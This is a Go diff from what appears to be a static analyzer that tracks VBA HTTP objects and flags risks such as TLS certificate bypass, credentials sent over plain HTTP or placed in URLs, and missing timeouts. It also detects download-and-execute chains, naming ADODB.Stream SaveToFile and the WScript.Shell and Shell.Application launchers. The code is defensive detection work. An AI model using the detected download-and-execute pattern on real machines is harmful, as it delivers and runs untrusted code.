+			key := strings.ToLower(strings.TrimSpace(name))
+			if key == "" {
+				continue
+			}
+			destination := values[key]
+			if destination == nil {
+				destination = map[string]bool{}
+				values[key] = destination
+			}
+			for _, candidate := range candidates {
+				if !destination[candidate] {
+					destination[candidate] = true
+					changed = true
+				}
+			}
+		}
+		if !changed {
+			break
+		}
+	}
+	return values
+}
+
+func httpCompactStringCandidates(expr string, values map[string]map[string]bool) []string {
+	parts := splitHTTPConcat(strings.TrimSpace(expr))
+	if len(parts) == 0 || (len(parts) == 1 && strings.TrimSpace(parts[0]) == "") {
+		return nil
+	}
+	candidates := []string{""}
+	const maxCandidates = 64
+	for _, rawPart := range parts {
+		part := strings.TrimSpace(rawPart)
+		var pieces []string
+		if len(part) >= 2 && part[0] == '"' && part[len(part)-1] == '"' {
+			pieces = []string{strings.ReplaceAll(part[1:len(part)-1], `""`, `"`)}
+		} else {
+			key := strings.ToLower(strings.TrimRight(part, "$%&@!#^"))
+			for value := range values[key] {
+				pieces = append(pieces, value)
+			}
+			sort.Strings(pieces)
+		}
+		if len(pieces) == 0 {
+			return nil
+		}
+		next := make([]string, 0, len(candidates)*len(pieces))
+		for _, prefix := range candidates {
+			for _, piece := range pieces {
+				if len(next) == maxCandidates {
+					break
+				}
+				next = append(next, prefix+piece)
+			}
+			if len(next) == maxCandidates {
+				break
+			}
+		}
+		candidates = next
+	}
+	return candidates
+}
+
+func (e *httpCompactEnvironment) bind(environment semanticstate.Environment) {
+	for _, variable := range e.variables {
+		objectName := "object:" + variable
+		launcherName := "launcher:" + variable
+		valueName := "value:" + variable
+		sensitiveName := "sensitive:" + variable
+		objectID, _ := environment.Symbol(objectName)
+		launcherID, _ := environment.Symbol(launcherName)
+		valueID, _ := environment.Symbol(valueName)
+		sensitiveID, _ := environment.Symbol(sensitiveName)
+		e.objects[variable] = httpCompactSlot{id: objectID, name: objectName, variable: variable, class: httpCompactObjectSlot}
+		e.launchers[variable] = httpCompactSlot{id: launcherID, name: launcherName, variable: variable, class: httpCompactLauncherSlot}
+		e.values[variable] = httpCompactSlot{id: valueID, name: valueName, variable: variable, class: httpCompactValueSlot}
+		e.sensitive[variable] = httpCompactSlot{id: sensitiveID, name: sensitiveName, variable: variable, class: httpCompactSensitiveSlot}
+		if !e.saveVars[variable] {
+			continue
+		}
+		for _, site := range e.saveSites {
+			name := fmt.Sprintf("saved:%s:%d", variable, site)
+			id, _ := environment.Symbol(name)
+			e.saved[variable] = append(e.saved[variable], httpCompactSlot{id: id, name: name, variable: variable, class: httpCompactSavedSlot, siteID: site})
+		}
+		for _, path := range e.savePaths {
+			name := "saved-path:" + variable + ":" + path
+			id, _ := environment.Symbol(name)
+			e.savedPath[variable] = append(e.savedPath[variable], httpCompactSlot{id: id, name: name, variable: variable, class: httpCompactSavedSlot, path: path})
+		}
+	}
+}
+
+func (e *httpCompactEnvironment) seed(state *semanticstate.State[httpScalar]) {
+	for _, variable := range e.variables {
+		state.Set(e.objects[variable].id, httpScalarZero(httpCompactObjectSlot))
+		state.Set(e.launchers[variable].id, httpScalarZero(httpCompactLauncherSlot))
+		state.Set(e.values[variable].id, httpScalarZero(httpCompactValueSlot))
+		state.Set(e.sensitive[variable].id, httpScalarZero(httpCompactSensitiveSlot))
+		for _, slot := range e.saved[variable] {
+			state.Set(slot.id, httpScalarZero(httpCompactSavedSlot))
+		}
+		for _, slot := range e.savedPath[variable] {
+			state.Set(slot.id, httpScalarZero(httpCompactSavedSlot))
+		}
+	}
+	for name, object := range e.initial.objects {
+		if slot, ok := e.objects[name]; ok {
+			state.Set(slot.id, httpScalar{class: httpCompactObjectSlot, object: httpCompactObject{present: object.kind != httpUnknown, kind: object.kind, identity: object.identity, url: object.url, urlKnown: object.urlKnown, hasCredentials: object.hasCredentials, timeoutConfigured: object.timeoutConfigured, timeoutInfinite: object.timeoutInfinite, downloaded: object.downloaded}})
+		}
+	}
+	for name, value := range e.initial.strings {
+		if e.initial.known[name] {
+			if slot, ok := e.values[name]; ok {
+				state.Set(slot.id, httpScalar{class: httpCompactValueSlot, present: true, text: value})
+			}
+		}
+	}
+	for name, value := range e.initial.launchers {
+		if slot, ok := e.launchers[name]; ok {
+			state.Set(slot.id, httpScalar{class: httpCompactLauncherSlot, present: value != "", text: value})
+		}
+	}
+	for name, value := range e.initial.sensitive {
+		if slot, ok := e.sensitive[name]; ok {
+			state.Set(slot.id, httpScalar{class: httpCompactSensitiveSlot, present: true, flag: value})
+		}
+	}
+}
+
+func httpCompactValue(view semanticstate.StateView[httpScalar], slot httpCompactSlot) httpScalar {
+	value, ok := view.Value(slot.id)
+	if !ok {
+		return httpScalarZero(slot.class)
+	}
+	return value
+}
+
+func httpCompactSet(state *semanticstate.State[httpScalar], slot httpCompactSlot, value httpScalar) {
+	state.Set(slot.id, value)
+}
+
+func (e *httpCompactEnvironment) object(view semanticstate.StateView[httpScalar], name string) httpCompactObject {
+	if slot, ok := e.objects[name]; ok {
+		return httpCompactValue(view, slot).object
+	}
+	return httpCompactObject{}
+}
+
+func (e *httpCompactEnvironment) copySaved(view semanticstate.StateView[httpScalar], out *semanticstate.State[httpScalar], from, to string) {
+	for index, slot := range e.saved[from] {
+		if index < len(e.saved[to]) {
+			httpCompactSet(out, e.saved[to][index], httpCompactValue(view, slot))
+		}
+	}
+	for index, slot := range e.savedPath[from] {
+		if index < len(e.savedPath[to]) {
+			httpCompactSet(out, e.savedPath[to][index], httpCompactValue(view, slot))
+		}
+	}
+}
+
+func (e *httpCompactEnvironment) clearSaved(out *semanticstate.State[httpScalar], variable string) {
+	for _, slot := range e.saved[variable] {
+		httpCompactSet(out, slot, httpScalarZero(httpCompactSavedSlot))
+	}
+	for _, slot := range e.savedPath[variable] {
+		httpCompactSet(out, slot, httpScalarZero(httpCompactSavedSlot))
+	}
+}
+
+func (e *httpCompactEnvironment) setObjectAliases(view semanticstate.StateView[httpScalar], out *semanticstate.State[httpScalar], receiver string, object httpCompactObject) {
+	if slot, ok := e.objects[receiver]; ok {
+		httpCompactSet(out, slot, httpScalar{class: httpCompactObjectSlot, object: object})
+	}
+	if object.identity == "" {
+		return
+	}
+	for _, name := range e.variables {
+		if name == receiver {
+			continue
+		}
+		candidate := e.object(view, name)
+		if candidate.present && candidate.identity == object.identity {
+			if slot, ok := e.objects[name]; ok {
+				httpCompactSet(out, slot, httpScalar{class: httpCompactObjectSlot, object: object})
+			}
+			for index, saved := range e.saved[receiver] {
+				if index < len(e.saved[name]) {
+					httpCompactSet(out, e.saved[name][index], httpCompactValue(view, saved))
+				}
+			}
+			for index, saved := range e.savedPath[receiver] {
+				if index < len(e.savedPath[name]) {
+					httpCompactSet(out, e.savedPath[name][index], httpCompactValue(view, saved))
+				}
+			}
+		}
+	}
+}
+
+func (e *httpCompactEnvironment) constructorIdentity(variable string, statementID int) string {
+	return e.identityByKey[variable+fmt.Sprintf("|%d", statementID)]
+}
+
+func httpCompactConstantString(expr string, view semanticstate.StateView[httpScalar], e *httpCompactEnvironment) (string, bool) {
+	parts := splitHTTPConcat(strings.TrimSpace(expr))
+	if len(parts) == 0 || (len(parts) == 1 && strings.TrimSpace(parts[0]) == "") {
+		return "", false
+	}
+	var builder strings.Builder
+	for _, part := range parts {
+		part = strings.TrimSpace(part)
+		if len(part) >= 2 && part[0] == '"' && part[len(part)-1] == '"' {
+			builder.WriteString(strings.ReplaceAll(part[1:len(part)-1], `""`, `"`))
+			continue
+		}
+		key := strings.ToLower(strings.TrimRight(part, "$%&@!#^"))
+		slot, ok := e.values[key]
+		if !ok {
+			return "", false
+		}
+		value := httpCompactValue(view, slot)
+		if !value.present {
+			return "", false
+		}
+		builder.WriteString(value.text)
+	}
+	return builder.String(), true
+}
+
+func httpCompactInteger(expr string, view semanticstate.StateView[httpScalar], e *httpCompactEnvironment) (int, bool) {
+	text := strings.TrimSpace(expr)
+	if slot, ok := e.values[strings.ToLower(text)]; ok {
+		value := httpCompactValue(view, slot)
+		if value.present {
+			text = value.text
+		}
+	}
+	text = strings.ReplaceAll(strings.ReplaceAll(text, "&H", "0x"), "&h", "0x")
+	text = strings.TrimRight(text, "%&@!#$")
+	n, err := strconv.ParseInt(text, 0, strconv.IntSize)
+	return int(n), err == nil
+}
+
+func httpCompactSensitive(expr string, view semanticstate.StateView[httpScalar], e *httpCompactEnvironment) bool {
+	if httpAuthLiteralRe.MatchString(expr) {
+		return true
+	}
+	lower := strings.ToLower(expr)
+	for name, slot := range e.sensitive {
+		value := httpCompactValue(view, slot)
+		if value.present && value.flag && containsHTTPIdentifierToken(lower, name) {
+			return true
+		}
+	}
+	return false
+}
+
+func httpCompactMarkSensitive(expr string, out *semanticstate.State[httpScalar], view semanticstate.StateView[httpScalar], e *httpCompactEnvironment) {
+	for _, match := range httpIdentifierRe.FindAllStringIndex(expr, -1) {
+		name := strings.ToLower(expr[match[0]:match[1]])
+		rest := strings.TrimLeft(expr[match[1]:], " \t")
+		if strings.HasPrefix(rest, "(") {
+			continue
+		}
+		if slot, ok := e.sensitive[name]; ok {
+			httpCompactSet(out, slot, httpScalar{class: httpCompactSensitiveSlot, present: true, flag: true})
+		}
+	}
+}
+
+func httpCompactTLSRisk(kind httpClientKind, option, value string, view semanticstate.StateView[httpScalar], e *httpCompactEnvironment) string {
+	lower := strings.ToLower(option)
+	n, known := httpCompactInteger(value, view, e)
+	if kind == httpServerXML && (lower == "2" || strings.Contains(lower, "ignore_server_ssl_cert")) && known && n != 0 {
+		return "certificate_validation_bypass"
+	}
+	if kind != httpWinHTTP {
+		return ""
+	}
+	if (lower == "4" || strings.Contains(lower, "sslerrorignoreflags")) && known && n != 0 {
+		return "certificate_validation_bypass"
+	}
+	if lower == "18" || strings.Contains(lower, "enablecertificaterevocationcheck") {
+		if (known && n == 0) || strings.EqualFold(strings.TrimSpace(value), "false") {
+			return "certificate_validation_bypass"
+		}
+	}
+	if lower == "9" || strings.Contains(lower, "secureprotocols") {
+		if known && n&(0x8|0x20|0x80|0x200) != 0 {
+			return "obsolete_tls_protocol"
+		}
+	}
+	return ""
+}
+
+func httpCompactResponseExpression(expr string, view semanticstate.StateView[httpScalar], e *httpCompactEnvironment) bool {
+	lower := strings.ToLower(expr)
+	if !strings.Contains(lower, "responsebody") && !strings.Contains(lower, "responsestream") {
+		return false
+	}
+	for name, slot := range e.objects {
+		object := httpCompactValue(view, slot).object
+		if object.present && (object.kind == httpXML || object.kind == httpServerXML || object.kind == httpWinHTTP) && containsHTTPIdentifierToken(lower, name) {
+			return true
+		}
+	}
+	return false
+}
+
+type httpCompactSolve struct {
+	index       *semanticstate.Index
+	env         *httpCompactEnvironment
+	environment semanticstate.Environment
+	result      semanticstate.Result[httpScalar]
+	blocks      map[vbacfg.BlockID]semanticstate.BlockOrdinal
+	reachable   map[vbacfg.BlockID]bool
+	statements  map[int]vbacfg.BlockID
+	evidence    map[vbacfg.BlockID]httpEvidenceState
+	projection  semanticstate.State[httpScalar]
+}
+
+type httpCompactInput struct {
+	view  semanticstate.StateView[httpScalar]
+	valid bool
+}
+
+func (s *httpCompactSolve) entryState(id vbacfg.BlockID) httpCompactInput {
+	if !s.reachable[id] {
+		return httpCompactInput{}
+	}
+	ordinal, ok := s.blocks[id]
+	if !ok {
+		return httpCompactInput{}
+	}
+	return httpCompactInput{view: s.result.State(ordinal, 0), valid: true}
+}
+
+func (s *httpCompactSolve) collect(file parsedFile, proc sourceProcedure, statement procedureir.Statement, view semanticstate.StateView[httpScalar]) []httpFindingSpec {
+	// Projection runs are ordered by CFG block and never overlap. Reuse one
+	// scalar scratch state instead of allocating a complete indexed state for
+	// every diagnostic statement after fixed-point convergence.
+	s.projection.CloneFrom(view, httpScalarLattice{}.Clone)
+	var evidence httpEvidenceState
+	if block, ok := s.statements[statement.ID]; ok {
+		evidence = s.evidence[block]
+	}
+	return httpCompactTransfer(file, proc, statement, s.env, view, &s.projection, true, &evidence)
+}
+
+func solveHTTPCompactStates(ctx context.Context, a Analyzer, file parsedFile, proc sourceProcedure, graph vbacfg.Graph, initial httpAnalysisState) (*httpCompactSolve, error) {
+	view := graph.View(vbacfg.EdgeFilter{})
+	index, err := semanticstate.NewIndexView(view)
+	if err != nil {
+		return nil, err
+	}
+	env, environment := buildHTTPCompactEnvironment(file, proc, initial)
+	env.analyzer = a
+	env.bind(environment)
+	solver, err := semanticstate.NewSolver(index, environment, httpScalarLattice{}, []semanticstate.Lane[httpScalar]{{
+		Initialize: func(_ context.Context, _ semanticstate.LaneOrdinal, state *semanticstate.State[httpScalar]) error {
+			env.seed(state)
+			return nil
+		},
+		Transfer: func(_ context.Context, _ semanticstate.LaneOrdinal, block semanticstate.BlockOrdinal, input semanticstate.StateView[httpScalar], output *semanticstate.State[httpScalar]) error {
+			output.CloneFrom(input, httpScalarLattice{}.Clone)
+			candidate, ok := view.BlockAtOrdinal(vbacfg.BlockOrdinal(block))
+			if !ok || candidate.Statement == nil || candidate.Statement.Recovered {
+				return nil
+			}
+			httpCompactTransfer(file, proc, *candidate.Statement, env, input, output, false, nil)
+			return nil
+		},
+	}})
+	if err != nil {
+		return nil, err
+	}
+	result, err := solver.SolveContext(ctx)
+	if err != nil {
+		return nil, err
+	}
+	blocks := make(map[vbacfg.BlockID]semanticstate.BlockOrdinal, index.BlockCount())
+	for _, block := range index.Blocks() {
+		blocks[block.ID] = block.Ordinal
+	}
+	reachable := make(map[vbacfg.BlockID]bool)
+	for _, id := range graph.Reachable(vbacfg.EdgeFilter{}) {
+		reachable[id] = true
+	}
+	statements := make(map[int]vbacfg.BlockID)
+	for _, block := range graph.Blocks {
+		if block.Statement != nil {
+			statements[block.Statement.ID] = block.ID
+		}
+	}
+	base := &httpCompactSolve{env: env, environment: environment, result: result, blocks: blocks, reachable: reachable, statements: statements}
+	evidence, err := solveHTTPEvidence(ctx, file, proc, graph, initial, base)
+	if err != nil {
+		return nil, err
+	}
+	return &httpCompactSolve{index: index, env: env, environment: environment, result: result, blocks: blocks, reachable: reachable, statements: statements, evidence: evidence, projection: semanticstate.NewState[httpScalar](environment.Layout())}, nil
+}
+
+func httpCompactTransfer(file parsedFile, proc sourceProcedure, statement procedureir.Statement, e *httpCompactEnvironment, input semanticstate.StateView[httpScalar], output *semanticstate.State[httpScalar], collect bool, evidence *httpEvidenceState) []httpFindingSpec {
+	text := strings.TrimSpace(stripVBAFileComment(statement.Text))
+	if text == "" {
+		return nil
+	}
+	line := statement.Range.StartLine
+	if line <= 0 {
+		line = proc.StartLine
+	}
+	var findings []httpFindingSpec
+
+	if match := httpObjectAssignmentRe.FindStringSubmatch(text); len(match) == 3 {
+		target, rhs := strings.ToLower(match[1]), strings.TrimSpace(match[2])
+		previousObject := e.object(input, target)
+		if objectSlot, ok := e.objects[target]; ok {
+			httpCompactSet(output, objectSlot, httpScalarZero(httpCompactObjectSlot))
+		}
+		if launcherSlot, ok := e.launchers[target]; ok {
+			httpCompactSet(output, launcherSlot, httpScalarZero(httpCompactLauncherSlot))
+		}
+		sourceName := strings.ToLower(strings.TrimSpace(rhs))
+		sourceObject := e.object(input, sourceName)
+		sourceLauncher := httpScalarZero(httpCompactLauncherSlot)
+		if launcherSlot, ok := e.launchers[sourceName]; ok {
+			sourceLauncher = httpCompactValue(input, launcherSlot)
+		}
+		switch {
+		case httpKindFromConstruction(rhs) != httpUnknown:
+			kind := httpKindFromConstruction(rhs)
+			identity := e.constructorIdentity(target, statement.ID)
+			if identity == "" {
+				identity = fmt.Sprintf("%s@%d", target, statement.ID)
+			}
+			if objectSlot, ok := e.objects[target]; ok {
+				httpCompactSet(output, objectSlot, httpScalar{class: httpCompactObjectSlot, object: httpCompactObject{present: true, kind: kind, identity: identity}})
+			}
+			e.clearSaved(output, target)
+		case sourceObject.present && sourceObject.kind != httpUnknown:
+			source := sourceName
+			object := sourceObject
+			if object.identity == "" {
+				object.identity = source
+			}
+			if slot, ok := e.objects[target]; ok {
+				httpCompactSet(output, slot, httpScalar{class: httpCompactObjectSlot, object: object})
+			}
+			// Read the RHS from the incoming block state.  In particular, a
+			// self-assignment must not observe the target after its destination
+			// slots were cleared above.
+			e.copySaved(input, output, source, target)
+		case httpLauncherFromConstruction(rhs) != "":
+			if slot, ok := e.launchers[target]; ok {
+				httpCompactSet(output, slot, httpScalar{class: httpCompactLauncherSlot, present: true, text: httpLauncherFromConstruction(rhs)})
+			}
+			e.clearSaved(output, target)
+		case sourceLauncher.present:
+			launcher := sourceLauncher
+			if slot, ok := e.launchers[target]; ok {
+				httpCompactSet(output, slot, launcher)
+			}
+			e.clearSaved(output, target)
+		case httpPartialNewMatches(previousObject.kind, rhs):
+			if slot, ok := e.objects[target]; ok {
+				httpCompactSet(output, slot, httpScalar{class: httpCompactObjectSlot, object: previousObject})
+			}
+		case !httpPartialNewMatches(previousObject.kind, rhs):
+			// The target was already cleared above, matching the legacy unknown
+			// reassignment behavior.
+			e.clearSaved(output, target)
+		}
+	}
+
+	if name, expr, ok := fileAssignment(text); ok && !strings.HasPrefix(strings.ToLower(text), "set ") {
+		key := strings.ToLower(name)
+		if slot, exists := e.values[key]; exists {
+			if value, known := httpCompactConstantString(expr, output.View(), e); known {
+				httpCompactSet(output, slot, httpScalar{class: httpCompactValueSlot, present: true, text: value})
+			} else {
+				httpCompactSet(output, slot, httpScalarZero(httpCompactValueSlot))
+			}
+		}
+		if slot, exists := e.sensitive[key]; exists {
+			httpCompactSet(output, slot, httpScalar{class: httpCompactSensitiveSlot, present: true, flag: httpCompactSensitive(expr, output.View(), e)})
+		}
+	}
+
+	if match := httpOptionAssignmentRe.FindStringSubmatch(text); len(match) == 5 {
+		receiver := strings.ToLower(match[1])
+		object := e.object(output.View(), receiver)
+		option := strings.TrimSpace(match[2])
+		if option == "" {
+			option = strings.TrimSpace(match[3])
+		}
+		value := strings.TrimSpace(match[4])
+		if object.present && (object.kind == httpWinHTTP || object.kind == httpServerXML) {
+			if risk := httpCompactTLSRisk(object.kind, option, value, output.View(), e); risk != "" && collect {
+				findings = append(findings, httpFindingSpec{line: line, column: strings.Index(strings.ToLower(text), "option"), code: "VBA246", api: string(object.kind), risk: risk, redact: true})
+			}
+		}
+	}
+	if match := httpSetOptionCallRe.FindStringSubmatchIndex(text); match != nil {
+		receiver := strings.ToLower(text[match[2]:match[3]])
+		object := e.object(output.View(), receiver)
+		args := httpMethodArgs(text, match[1])
+		if object.present && (object.kind == httpServerXML || object.kind == httpWinHTTP) && len(args) >= 2 {
+			if risk := httpCompactTLSRisk(object.kind, args[0], args[1], output.View(), e); risk != "" && collect {
+				findings = append(findings, httpFindingSpec{line: line, column: strings.Index(strings.ToLower(text), "setoption"), code: "VBA246", api: string(object.kind), risk: risk})
+			}
+		}
+	}
+	if httpLogRe.MatchString(text) && httpCompactSensitive(text, output.View(), e) && collect {
+		findings = append(findings, httpFindingSpec{line: line, code: "VBA246", risk: "authorization_logging", redact: true})
+	}
+	if collect && httpCompactIsProcessLaunch(text, output.View(), e) {
+		for _, arg := range httpLaunchArgs(text) {
+			path, known := httpCompactConstantString(arg, output.View(), e)
+			if !known {
+				continue
+			}
+			launchKey := httpPathKey(path)
+			for name, objectSlot := range e.objects {
+				object := httpCompactValue(output.View(), objectSlot).object
+				if !object.present || object.kind != httpADOStream {
+					continue
+				}
+				matched := false
+				for _, savedSlot := range e.saved[name] {
+					saved := httpCompactValue(output.View(), savedSlot)
+					if saved.present && (launchKey == saved.text || httpCommandContainsPath(launchKey, saved.text)) {
+						matched = true
+						break
+					}
+				}
+				if !matched {
+					for _, savedSlot := range e.savedPath[name] {
+						saved := httpCompactValue(output.View(), savedSlot)
+						if saved.present && (launchKey == savedSlot.path || httpCommandContainsPath(launchKey, savedSlot.path)) {
+							matched = true
+							break
+						}
+					}
+				}
+				if matched {
+					findings = append(findings, httpFindingSpec{line: line, code: "VBA246", api: "ADODB.Stream", risk: "download_and_execute", redact: true})
+				}
+			}
+		}
+	}
+
+	match := httpMemberCallRe.FindStringSubmatchIndex(text)
+	if match == nil {
+		return findings
+	}
+	receiver := strings.ToLower(text[match[2]:match[3]])
+	method := strings.ToLower(text[match[4]:match[5]])
+	object := e.object(output.View(), receiver)
+	if !object.present {
+		return findings
+	}
+	args := httpMethodArgs(text, match[1])
+	switch method {
+	case "open":
+		if object.kind != httpXML && object.kind != httpServerXML && object.kind != httpWinHTTP {
+			break
+		}
+		if len(args) > 1 {
+			object.url, object.urlKnown = httpCompactConstantString(args[1], output.View(), e)
+			if object.urlKnown && httpURLHasCredentials(object.url) && httpIsWebURL(object.url) && collect {
+				findings = append(findings, httpFindingSpec{line: line, code: "VBA246", api: string(object.kind), risk: "credentials_in_url", origin: httpRedactedOrigin(object.url), redact: true})
+			}
+		}
+		if len(args) > 3 && !httpCompactKnownEmpty(args[3], output.View(), e) || len(args) > 4 && !httpCompactKnownEmpty(args[4], output.View(), e) {
+			object.hasCredentials = true
+		}
+		e.setObjectAliases(output.View(), output, receiver, object)
+	case "setrequestheader":
+		if object.kind == httpXML || object.kind == httpServerXML || object.kind == httpWinHTTP {
+			header, headerKnown := "", false
+			if len(args) > 0 {
+				header, headerKnown = httpCompactConstantString(args[0], output.View(), e)
+			}
+			if headerKnown && httpSensitiveHeaderRe.MatchString(strings.TrimSpace(header)) {
+				object.hasCredentials = true
+				sensitiveModuleConstant := len(args) > 1 && httpCompactUsesSensitiveModuleConstant(args[1], file, output.View(), e)
+				if len(args) > 1 {
+					httpCompactMarkSensitive(args[1], output, output.View(), e)
+				}
+				if collect && sensitiveModuleConstant {
+					findings = append(findings, httpFindingSpec{line: line, code: "VBA246", api: string(object.kind), risk: "sensitive_module_constant", header: canonicalHTTPHeader(header), redact: true})
+				}
+			}
+			e.setObjectAliases(output.View(), output, receiver, object)
+		}
+	case "setcredentials":
+		if object.kind == httpWinHTTP {
+			object.hasCredentials = true
+			e.setObjectAliases(output.View(), output, receiver, object)
+		}
+	case "settimeouts":
+		if object.kind == httpWinHTTP || object.kind == httpServerXML {
+			object.timeoutConfigured = len(args) == 4
+			object.timeoutInfinite = false
+			for _, arg := range args {
+				if n, ok := httpCompactInteger(arg, output.View(), e); ok && (n == 0 || n == -1) {
+					object.timeoutInfinite = true
+					object.timeoutConfigured = false
+				}
+			}
+			e.setObjectAliases(output.View(), output, receiver, object)
+		}
+	case "send":
+		if object.kind != httpXML && object.kind != httpServerXML && object.kind != httpWinHTTP {
+			break
+		}
+		if collect && object.urlKnown && strings.EqualFold(httpURLScheme(object.url), "http") && object.hasCredentials && !e.analyzer.isDevelopmentHTTPURL(object.url) {
+			owned := map[int]bool{}
+			if evidence != nil {
+				owned = cloneHTTPIntSet(evidence.sinks[receiver])
+			}
+			findings = append(findings, httpFindingSpec{line: line, code: "VBA246", api: string(object.kind), risk: "plain_http_credentials", origin: httpRedactedOrigin(object.url), redact: true, ownedSinks: owned})
+		}
+		if collect && (object.kind == httpServerXML || object.kind == httpWinHTTP) && !object.timeoutConfigured {
+			timeout := "missing"
+			if object.timeoutInfinite {
+				timeout = "unbounded"
+			}
+			findings = append(findings, httpFindingSpec{line: line, code: "VBA247", api: string(object.kind), risk: "missing_http_timeout", timeout: timeout})
+		}
+	case "write":
+		if object.kind == httpADOStream && len(args) > 0 {
+			object.downloaded = httpCompactResponseExpression(args[0], output.View(), e)
+			e.setObjectAliases(output.View(), output, receiver, object)
+			// Write replaces the stream contents, so any executable path
+			// witness attached to the receiver (and its known aliases) is
+			// invalidated.  An uncertain identity must not accidentally clear
+			// unrelated variables whose scalar identity is also empty.
+			e.clearSaved(output, receiver)
+			if object.identity != "" {
+				for _, name := range e.variables {
+					if name == receiver {
+						continue
+					}
+					candidate := e.object(output.View(), name)
+					if candidate.present && candidate.identity == object.identity {
+						e.clearSaved(output, name)
+					}
+				}
+			}
+		}
+	case "savetofile":
+		if object.kind == httpADOStream && object.downloaded && len(args) > 0 {
+			if path, known := httpCompactConstantString(args[0], output.View(), e); known && httpExecutableExtRe.MatchString(strings.ToLower(path)) {
+				site := statement.ID
+				for _, slot := range e.saved[receiver] {
+					if slot.siteID == site {
+						httpCompactSet(output, slot, httpScalar{class: httpCompactSavedSlot, present: true, text: httpPathKey(path)})
+					}
+				}
+				canonicalPath := httpPathKey(path)
+				for _, slot := range e.savedPath[receiver] {
+					if slot.path == canonicalPath {
+						httpCompactSet(output, slot, httpScalar{class: httpCompactSavedSlot, present: true, text: canonicalPath})
+					}
+				}
+				// SaveToFile mutates the stream identity. Propagate the indexed
+				// witness to every live alias just as object member mutation
+				// propagates the semantic object facts.
+				e.setObjectAliases(output.View(), output, receiver, object)
+			}
+		}
+	}
+	return findings
+}
+
+func httpCompactKnownEmpty(expr string, view semanticstate.StateView[httpScalar], e *httpCompactEnvironment) bool {
+	value, known := httpCompactConstantString(expr, view, e)
+	return known && value == ""
+}
+
+func httpCompactUsesSensitiveModuleConstant(expr string, file parsedFile, view semanticstate.StateView[httpScalar], e *httpCompactEnvironment) bool {
+	if facts := file.ModuleFacts; facts != nil {
+		found := false
+		facts.forEachConstant(func(constant moduleConstantFact) {
+			if found || !constant.Module {
+				return
+			}
+			name := strings.ToLower(constant.Name)
+			if slot, ok := e.sensitive[name]; ok {
+				value := httpCompactValue(view, slot)
+				if value.present && value.flag && containsHTTPIdentifierToken(strings.ToLower(expr), name) {
+					found = true
+				}
+			}
+		})
+		return found
+	}
+	for _, declaration := range file.IR.Declarations {
+		name := strings.ToLower(declaration.Name)
+		if declaration.Scope == procedureir.ScopeModule && declaration.Kind == "const" && containsHTTPIdentifierToken(strings.ToLower(expr), name) {
+			if slot, ok := e.sensitive[name]; ok {
+				value := httpCompactValue(view, slot)
+				if value.present && value.flag {
+					return true
+				}
+			}
+		}
+	}
+	return false
+}
+
+func httpCompactIsProcessLaunch(text string, view semanticstate.StateView[httpScalar], e *httpCompactEnvironment) bool {
+	lower := strings.ToLower(strings.TrimSpace(text))
+	if strings.HasPrefix(lower, "shell ") || httpWin32LauncherRe.MatchString(lower) {
+		return true
+	}
+	match := httpObjectLauncherRe.FindStringSubmatchIndex(text)
+	if match == nil {
+		return false
+	}
+	dot := strings.Index(text, ".")
+	if dot < 0 {
+		return false
+	}
+	receiver := strings.ToLower(strings.TrimSpace(text[:dot]))
+	matchedCall := strings.ToLower(text[match[0]:match[1]])
+	method := ""
+	for _, candidate := range []string{"shellexecute", "exec", "run"} {
+		if strings.Contains(matchedCall, candidate) {
+			method = candidate
+			break
+		}
+	}
+	launcher := httpCompactValue(view, e.launchers[receiver])
+	return launcher.present && ((launcher.text == "wscript.shell" && (method == "run" || method == "exec")) || (launcher.text == "shell.application" && method == "shellexecute"))
+}
+
+// Evidence is intentionally separate from semanticstate.State. It only
+// carries source offsets needed to suppress duplicate VBA224 findings.
+type httpEvidenceState struct {
+	objects map[string]string
+	unknown map[string]bool
+	sinks   map[string]map[int]bool
+}
+
+func cloneHTTPEvidence(in httpEvidenceState) httpEvidenceState {
+	out := httpEvidenceState{objects: map[string]string{}, unknown: map[string]bool{}, sinks: map[string]map[int]bool{}}
+	for name, identity := range in.objects {
+		out.objects[name] = identity
+	}
+	for name, unknown := range in.unknown {
+		out.unknown[name] = unknown
+	}
+	for name, values := range in.sinks {
+		out.sinks[name] = cloneHTTPIntSet(values)
+	}
+	return out
+}
+
+func joinHTTPEvidence(left, right httpEvidenceState, initialized bool) (httpEvidenceState, bool) {
+	if !initialized {
+		return cloneHTTPEvidence(right), true
+	}
+	out := cloneHTTPEvidence(left)
+	changed := false
+	for name, identity := range left.objects {
+		rightIdentity, present := right.objects[name]
+		if !present {
+			delete(out.objects, name)
+			delete(out.unknown, name)
+			delete(out.sinks, name)
+			changed = true
+			continue
+		}
+		if left.unknown[name] || right.unknown[name] || identity != rightIdentity {
+			if out.objects[name] != "" || !out.unknown[name] {
+				out.objects[name] = ""
+				out.unknown[name] = true
+				changed = true
+			}
+		}
+		merged := cloneHTTPIntSet(left.sinks[name])
+		for sink := range right.sinks[name] {
+			merged[sink] = true
+		}
+		if !sameHTTPIntSet(merged, left.sinks[name]) {
+			out.sinks[name] = merged
+			changed = true
+		}
+	}
+	for name := range out.objects {
+		if _, ok := right.objects[name]; !ok {
+			delete(out.objects, name)
+			delete(out.unknown, name)
+			delete(out.sinks, name)
+			changed = true
+		}
+	}
+	return out, changed
+}
+
+func solveHTTPEvidence(ctx context.Context, file parsedFile, proc sourceProcedure, graph vbacfg.Graph, initial httpAnalysisState, solve *httpCompactSolve) (map[vbacfg.BlockID]httpEvidenceState, error) {
+	states := map[vbacfg.BlockID]httpEvidenceState{graph.Entry: {objects: map[string]string{}, unknown: map[string]bool{}, sinks: map[string]map[int]bool{}}}
+	for name, object := range initial.objects {
+		if object.identity != "" {
+			states[graph.Entry].objects[name] = object.identity
+		}
+	}
+	queue := []vbacfg.BlockID{graph.Entry}
+	queued := map[vbacfg.BlockID]bool{graph.Entry: true}
+	for len(queue) > 0 {
+		if err := ctx.Err(); err != nil {
+			return nil, err
+		}
+		id := queue[0]
+		queue = queue[1:]
+		queued[id] = false
+		state := cloneHTTPEvidence(states[id])
+		block, ok := graph.BlockByID(id)
+		if ok && block.Statement != nil && !block.Statement.Recovered {
+			ordinal, found := solve.blocks[id]
+			if found {
+				input := solve.result.State(ordinal, 0)
+				transferHTTPEvidence(*block.Statement, &state, input, solve.env)
+			}
+		}
+		for _, edge := range graph.OutgoingEdges(id) {
+			candidate := state
+			if edge.Class == vbacfg.EdgeExceptional || edge.Uncertain {
+				candidate = states[id]
+			}
+			previous, initialized := states[edge.To]
+			merged, changed := joinHTTPEvidence(previous, candidate, initialized)
+			if !changed {
+				continue
+			}
+			states[edge.To] = merged
+			if !queued[edge.To] {
+				queue = append(queue, edge.To)
+				queued[edge.To] = true
+			}
+		}
